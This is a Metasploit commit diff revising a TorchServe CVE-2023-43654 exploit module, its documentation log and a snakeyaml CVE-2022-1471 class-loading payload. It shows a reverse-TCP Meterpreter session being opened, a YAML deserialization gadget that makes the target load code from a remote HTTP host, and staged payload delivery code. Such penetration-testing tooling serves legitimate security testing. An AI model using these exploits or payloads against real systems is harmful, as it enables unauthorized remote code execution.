Address comments from the review

2023-10-11 16:56:20 -04:00 · 2023-10-11 16:56:20 -04:00 · 86b7ec4518
parent de8e392b7b
commit 86b7ec4518
5 changed files with 27 additions and 14 deletions
--- a/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md
+++ b/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md
@ -33,20 +33,21 @@ PAYLOAD => java/meterpreter/reverse_tcp
 msf6 exploit(multi/http/torchserver_cve_2023_43654) > set LHOST 192.168.159.128
 LHOST => 192.168.159.128
 msf6 exploit(multi/http/torchserver_cve_2023_43654) > run
+
 [*] Started reverse TCP handler on 192.168.159.128:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 0.8.1 is vulnerable.
-[*] Using URL: http://192.168.159.128:9090/exploit/
+[*] Using URL: http://192.168.159.128:9090/VLz5xafKtJOjBAv/
 [*] Registering the model archive...
 [+] Sending model archive
-[*] Sending stage (59909 bytes) to 172.17.0.2
-[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 172.17.0.2:39480) at 2023-10-05 16:13:54 -0400
+[*] Sending stage (57692 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:49662) at 2023-10-12 09:19:30 -0400
 [*] Server stopped.

 meterpreter > getuid
 Server username: model-server
 meterpreter > sysinfo
-Computer        : 4dbcfe5cc11c
+Computer        : 187de8da4e1b
 OS              : Linux 6.2.15-100.fc36.x86_64 (amd64)
 Architecture    : x64
 System Language : en_US
--- a/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
+++ b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
@ -1,4 +1,4 @@
-// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java
+// javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java
 import javax.script.ScriptEngine;
 import javax.script.ScriptEngineFactory;
 import java.io.IOException;
--- a/external/source/exploits/CVE-2022-1471/README.md
+++ b/external/source/exploits/CVE-2022-1471/README.md
@ -1,17 +1,25 @@
 # Overview
-The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit
-CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
+The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the
+exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
+
+See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.

 ## Compiling
-Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.
+It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the 
+[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
+files.
+
+Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.

 ## Usage
 Trigger the deserialization using the following YAML:
 ```yaml
-!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]
+!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]
 ```

 Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
 contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
 `Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
 deliver a Metasploit payload.
+
+[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java
--- a/lib/msf/core/exploit/remote/java/http/class_loader.rb
+++ b/lib/msf/core/exploit/remote/java/http/class_loader.rb
@ -63,21 +63,22 @@ module ClassLoader
    case resource
    # Stage 1
    when "#{class_name}.class"
-      vprint_good('Sending constructor class')
+      vprint_good('Sending the constructor class')
      # This contains the constructor that will call our JavaPayload
      res = constructor_class
    # Stage 2
    when 'metasploit/Payload.class'
-      vprint_good('Sending payload class')
+      vprint_good('Sending the main payload class')
      # This is our JavaPayload as a compiled class
      res = MetasploitPayloads.read('java/metasploit/Payload.class')
    # Stage 3
    when 'metasploit.dat'
-      vprint_good('Sending payload config')
+      vprint_good('Sending the payload configuration data')
      # This tells the target how to address the payload; this is the magic!
      res = payload_instance.stager_config
    # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp
-    when /^javapayload\/stage\/(Shell|Stage|StreamForwarder)\.class$/
+    when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/
+      vprint_good("Sending additional payload class: #{resource}")
      res = MetasploitPayloads.read("java/#{resource}")
    else
      vprint_error('Sending 404')
--- a/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
+++ b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
@ -70,7 +70,8 @@ class MetasploitModule < Msf::Exploit::Remote
    end

    version = res.get_json_document.dig('info', 'version')
-    return Exploit::CheckCode::Safe unless version.present?
+    return Exploit::CheckCode::Detected unless version.present?
+
    unless Rex::Version.new(version) < Rex::Version.new('8.0.2')
      return Exploit::CheckCode::Safe("Version #{version} is patched.")
    end
@ -144,6 +145,8 @@ class MetasploitModule < Msf::Exploit::Remote
  def cleanup
    super

+    return unless @model_name
+
    # see: https://pytorch.org/serve/management_api.html#unregister-a-model
    send_request_cgi({
      'method' => 'DELETE',